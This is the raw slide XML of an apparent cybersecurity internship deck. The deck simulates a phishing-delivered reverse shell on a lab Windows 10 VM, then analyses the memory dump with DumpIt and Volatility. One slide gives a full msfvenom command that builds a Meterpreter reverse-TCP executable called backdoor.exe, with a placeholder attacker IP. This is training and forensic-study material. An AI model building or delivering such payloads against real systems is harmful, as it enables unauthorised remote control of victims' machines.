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vetica World Italics" panose="020B0604020202020204" charset="-128"/>
      <p:regular r:id="rId12"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Apertur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vetica World" panose="020B0604020202020204" charset="-12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D48"/>
    <a:srgbClr val="F06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4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11.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.sv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5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12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18.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.sv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38696" y="1620298"/>
            <a:ext cx="1210608" cy="1361625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1210608" h="1361625">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1210608" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1210608" y="1361624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1361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457936"/>
            <a:ext cx="2505790" cy="800364"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2505790" h="800364">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2505790" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2505790" y="800364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="800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50495" y="8457936"/>
            <a:ext cx="2505790" cy="800364"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2505790" h="800364">
                <a:moveTo>
                  <a:pt x="2505791" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="800364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2505791" y="800364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25057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85597" y="9151278"/>
            <a:ext cx="516806" cy="57507"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="136114" cy="151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114" cy="15146"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="136114" h="15146">
                  <a:moveTo>
                    <a:pt x="7573" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="128541" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="130549" y="0"/>
                    <a:pt x="132475" y="798"/>
                    <a:pt x="133895" y="2218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135316" y="3638"/>
                    <a:pt x="136114" y="5564"/>
                    <a:pt x="136114" y="7573"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="136114" y="7573"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="136114" y="11755"/>
                    <a:pt x="132723" y="15146"/>
                    <a:pt x="128541" y="15146"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="7573" y="15146"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5564" y="15146"/>
                    <a:pt x="3638" y="14348"/>
                    <a:pt x="2218" y="12928"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="798" y="11508"/>
                    <a:pt x="0" y="9581"/>
                    <a:pt x="0" y="7573"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="7573"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="5564"/>
                    <a:pt x="798" y="3638"/>
                    <a:pt x="2218" y="2218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3638" y="798"/>
                    <a:pt x="5564" y="0"/>
                    <a:pt x="757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6114" cy="4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53782" y="3115272"/>
            <a:ext cx="17180435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75"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="12553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CYBERSECURITY &amp; DIGITAL FORENSICS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="17575"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="12553" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF3131"/>
              </a:solidFill>
              <a:latin typeface="Aperture"/>
              <a:ea typeface="Aperture"/>
              <a:cs typeface="Aperture"/>
              <a:sym typeface="Apertur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5355" y="8419836"/>
            <a:ext cx="7517291" cy="3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5"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1796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INTERNSHIP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7016" y="4256252"/>
            <a:ext cx="8473968" cy="187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87"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="13079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762314"/>
            <a:ext cx="7074713" cy="6395541"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6350000" cy="574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7"/>
              <a:stretch>
                <a:fillRect l="-11796" r="-3084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29472" y="6409591"/>
            <a:ext cx="3116344" cy="5246370"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="37719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8"/>
              <a:stretch>
                <a:fillRect l="-99311" r="-9931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289808" y="2260726"/>
            <a:ext cx="1236533" cy="12365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587968" y="2518954"/>
            <a:ext cx="640214" cy="720077"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="640214" h="720077">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="640214" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="640214" y="720077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7200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6330412" y="8329412"/>
            <a:ext cx="928888" cy="928888"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="928888" h="928888">
                <a:moveTo>
                  <a:pt x="928888" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="928888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928888" y="928888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92888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7565" y="2828989"/>
            <a:ext cx="7981735" cy="132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1"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="9165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8182" y="4556427"/>
            <a:ext cx="9690813" cy="332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993" lvl="1" indent="-254496" algn="l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the evolving threat landscape, phishing remains a leading vector for cyber intrusions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="508993" lvl="1" indent="-254496" algn="l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Attackers often leverage social engineering to trick users into executing malicious files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="508993" lvl="1" indent="-254496" algn="l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project simulates a phishing attack that results in a reverse shell, followed by in-depth memory forensic investigation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="508993" lvl="1" indent="-254496" algn="l">
              <a:lnSpc>
                <a:spcPts val="3300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="235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Objective: Bridge offensive techniques with defensive analysis.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35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059897" y="5670249"/>
            <a:ext cx="928888" cy="928888"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="928888" h="928888">
                <a:moveTo>
                  <a:pt x="928888" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="928889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928888" y="928889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92888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95154" y="2066651"/>
            <a:ext cx="3873203" cy="5456752"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="45072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9"/>
              <a:stretch>
                <a:fillRect t="-3253" b="-325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063354" y="2066651"/>
            <a:ext cx="6049721" cy="3631042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10"/>
              <a:stretch>
                <a:fillRect t="-2170" b="-217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63354" y="7234110"/>
            <a:ext cx="9167794" cy="103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124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OBJECTIVES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1042176" y="2066651"/>
            <a:ext cx="8400680" cy="8445063"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2212525" cy="22242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12525" cy="2224214"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2212525" h="2224214">
                  <a:moveTo>
                    <a:pt x="23040" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2189485" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2202210" y="0"/>
                    <a:pt x="2212525" y="10315"/>
                    <a:pt x="2212525" y="23040"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2212525" y="2201175"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2212525" y="2207285"/>
                    <a:pt x="2210097" y="2213145"/>
                    <a:pt x="2205777" y="2217466"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2201456" y="2221787"/>
                    <a:pt x="2195596" y="2224214"/>
                    <a:pt x="2189485" y="2224214"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="23040" y="2224214"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10315" y="2224214"/>
                    <a:pt x="0" y="2213899"/>
                    <a:pt x="0" y="2201175"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="23040"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="10315"/>
                    <a:pt x="10315" y="0"/>
                    <a:pt x="23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212525" cy="225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63354" y="2066651"/>
            <a:ext cx="1236533" cy="12365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361514" y="2324879"/>
            <a:ext cx="640214" cy="720077"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="640214" h="720077">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="640214" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="640214" y="720077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="720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96260" y="3305761"/>
            <a:ext cx="6381697" cy="591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057" lvl="1" indent="-306029" algn="l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Simulate a real-world phishing attack targeting a Windows 10 machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="612057" lvl="1" indent="-306029" algn="l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Generate a custom reverse shell payload using Metasploit's msfvenom.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="612057" lvl="1" indent="-306029" algn="l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Gain remote control using a Meterpreter session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="612057" lvl="1" indent="-306029" algn="l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 memory acquisition with DumpIt post-infection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="612057" lvl="1" indent="-306029" algn="l">
              <a:lnSpc>
                <a:spcPts val="3968"/>
              </a:lnSpc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Analyze memory dump with Volatility to detect malicious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244044"/>
            <a:ext cx="7432683" cy="3593786"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1957579" cy="946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7579" cy="946512"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1957579" h="946512">
                  <a:moveTo>
                    <a:pt x="26040" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1931539" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1945920" y="0"/>
                    <a:pt x="1957579" y="11659"/>
                    <a:pt x="1957579" y="26040"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1957579" y="920471"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1957579" y="934853"/>
                    <a:pt x="1945920" y="946512"/>
                    <a:pt x="1931539" y="946512"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="26040" y="946512"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11659" y="946512"/>
                    <a:pt x="0" y="934853"/>
                    <a:pt x="0" y="920471"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="26040"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="11659"/>
                    <a:pt x="11659" y="0"/>
                    <a:pt x="26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957579" cy="975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00167" y="2244044"/>
            <a:ext cx="7759133" cy="7014256"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6350000" cy="574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7"/>
              <a:stretch>
                <a:fillRect l="-17843" r="-1784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08195"/>
            <a:ext cx="12175811" cy="133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230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TOOLS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9573" y="2745197"/>
            <a:ext cx="6390938" cy="255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756" lvl="1" indent="-195378" algn="l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Operating Systems: Parrot OS (attacker), Windows 10 (victim)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="390756" lvl="1" indent="-195378" algn="l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Offensive Tools: msfvenom, Metasploit Framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="390756" lvl="1" indent="-195378" algn="l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Forensic Tools: DumpIt, Volatility 2.6.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="390756" lvl="1" indent="-195378" algn="l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Support Tools: Python HTTP server (file delivery), Shared Folder (file transfer), Wireshark (optional traffic capture), Flameshot (screenshots)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2533"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="180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6330412" y="8329412"/>
            <a:ext cx="928888" cy="92888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516272" y="8523394"/>
            <a:ext cx="480931" cy="540925"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="480931" h="540925">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="480931" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="480931" y="540924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="540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695820"/>
            <a:ext cx="9688066" cy="177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2"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6220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PHASE 1 - SIMULATING THE ATTACK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68560" y="2915370"/>
            <a:ext cx="7864418" cy="7638500"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2071287" cy="20117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1287" cy="2011786"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2071287" h="2011786">
                  <a:moveTo>
                    <a:pt x="24611" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2046677" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2060269" y="0"/>
                    <a:pt x="2071287" y="11019"/>
                    <a:pt x="2071287" y="24611"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2071287" y="1987175"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2071287" y="2000767"/>
                    <a:pt x="2060269" y="2011786"/>
                    <a:pt x="2046677" y="2011786"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="24611" y="2011786"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="18083" y="2011786"/>
                    <a:pt x="11824" y="2009193"/>
                    <a:pt x="7208" y="2004578"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2593" y="1999962"/>
                    <a:pt x="0" y="1993703"/>
                    <a:pt x="0" y="1987175"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="24611"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="18083"/>
                    <a:pt x="2593" y="11824"/>
                    <a:pt x="7208" y="7208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11824" y="2593"/>
                    <a:pt x="18083" y="0"/>
                    <a:pt x="246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71287" cy="2040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41400" y="3266139"/>
            <a:ext cx="7330104" cy="481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Payload created using:</a:t>
            </a:r>
          </a:p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msfvenom -p windows/meterpreter/reverse_tcp LHOST=&lt;attacker_ip&gt; LPORT=4444 -f exe &gt; backdoor.exe</a:t>
            </a:r>
          </a:p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Hosted on local Python server for delivery.</a:t>
            </a:r>
          </a:p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Victim executed payload triggering a reverse shell.</a:t>
            </a:r>
          </a:p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Meterpreter session provided control over the target system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="535163" lvl="1" indent="-267581" algn="just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RAM captured using DumpIt immediately post-compromise.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47677" y="4645754"/>
            <a:ext cx="7180941" cy="5383353"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7180941" h="5383353">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7180941" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7180941" y="5383353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5383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9144000" y="4801740"/>
            <a:ext cx="449124" cy="449124"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="449124" h="449124">
                <a:moveTo>
                  <a:pt x="449124" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="449124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="449124" y="449124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44912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360653"/>
            <a:ext cx="7432683" cy="6897647"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1957579" cy="1816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7579" cy="1816664"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1957579" h="1816664">
                  <a:moveTo>
                    <a:pt x="26040" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1931539" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1945920" y="0"/>
                    <a:pt x="1957579" y="11659"/>
                    <a:pt x="1957579" y="26040"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1957579" y="1790624"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1957579" y="1805006"/>
                    <a:pt x="1945920" y="1816664"/>
                    <a:pt x="1931539" y="1816664"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="26040" y="1816664"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11659" y="1816664"/>
                    <a:pt x="0" y="1805006"/>
                    <a:pt x="0" y="1790624"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="26040"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="11659"/>
                    <a:pt x="11659" y="0"/>
                    <a:pt x="26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957579" cy="1845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587764"/>
            <a:ext cx="928888" cy="9288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2679" y="2781746"/>
            <a:ext cx="480931" cy="540925"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="480931" h="540925">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="480931" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="480931" y="540924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5409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21203" y="4093375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2389228"/>
            <a:ext cx="8115300" cy="17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5958" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3131"/>
                </a:solidFill>
                <a:latin typeface="Aperture"/>
                <a:ea typeface="Aperture"/>
                <a:cs typeface="Aperture"/>
                <a:sym typeface="Aperture"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5958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PHASE 2 - EVIDENCE ACQUISITION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3921" y="3255995"/>
            <a:ext cx="5742241" cy="485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477" lvl="1" indent="-329738" algn="l">
              <a:lnSpc>
                <a:spcPts val="4276"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="305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Memory dump copied to Parrot OS via VirtualBox Shared Folder.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="659477" lvl="1" indent="-329738" algn="l">
              <a:lnSpc>
                <a:spcPts val="4276"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="305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Volatility's imageinfo used to determine appropriate profile.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="659477" lvl="1" indent="-329738" algn="l">
              <a:lnSpc>
                <a:spcPts val="4276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step is critical for accurate parsing and analysis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="4276"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3054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5255450"/>
            <a:ext cx="515300" cy="515300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="515300" h="515300">
                <a:moveTo>
                  <a:pt x="515300" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="515300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="515300" y="515300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5153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300402" y="1838730"/>
            <a:ext cx="6958898" cy="8448270"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1832796" cy="22250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32796" cy="2225059"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1832796" h="2225059">
                  <a:moveTo>
                    <a:pt x="27813" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1804983" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1812360" y="0"/>
                    <a:pt x="1819434" y="2930"/>
                    <a:pt x="1824650" y="8146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1829866" y="13362"/>
                    <a:pt x="1832796" y="20437"/>
                    <a:pt x="1832796" y="27813"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1832796" y="2197246"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1832796" y="2212606"/>
                    <a:pt x="1820344" y="2225059"/>
                    <a:pt x="1804983" y="2225059"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="27813" y="2225059"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20437" y="2225059"/>
                    <a:pt x="13362" y="2222129"/>
                    <a:pt x="8146" y="2216913"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2930" y="2211697"/>
                    <a:pt x="0" y="2204622"/>
                    <a:pt x="0" y="2197246"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="27813"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="20437"/>
                    <a:pt x="2930" y="13362"/>
                    <a:pt x="8146" y="8146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13362" y="2930"/>
                    <a:pt x="20437" y="0"/>
                    <a:pt x="278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832796" cy="2253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47956" y="1347894"/>
            <a:ext cx="6179335" cy="4485977"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6179335" h="4485977">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6179335" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6179335" y="4485977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4485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90" r="-8346" b="-59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71272" y="6329734"/>
            <a:ext cx="3940563" cy="3708756"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3940563" h="3708756">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3940563" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3940563" y="3708757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3708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554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601996"/>
            <a:ext cx="8115300" cy="190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3"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6648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PHASE 3 - MEMORY FORENSICS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7189" y="2954215"/>
            <a:ext cx="5965324" cy="33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935" lvl="1" indent="-229967" algn="l">
              <a:lnSpc>
                <a:spcPts val="2982"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="21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pslist: Revealed processes including unusual cmd.exe not tied to normal user activity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="459935" lvl="1" indent="-229967" algn="l">
              <a:lnSpc>
                <a:spcPts val="2982"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="21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cmdline: Showed limited or no command history, indicating stealth operation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="459935" lvl="1" indent="-229967" algn="l">
              <a:lnSpc>
                <a:spcPts val="2982"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="21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malfind: Detected injected code regions within process memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="459935" lvl="1" indent="-229967" algn="l">
              <a:lnSpc>
                <a:spcPts val="2982"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="21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Analysis confirmed post-exploitation activity typical of reverse shells.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2982"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="213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17769" y="2719194"/>
            <a:ext cx="9479602" cy="4269450"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8459470" cy="381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23989" b="-2398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32383" y="5826452"/>
            <a:ext cx="5669545" cy="4598833"/>
            <a:chOff x="0" y="0"/>
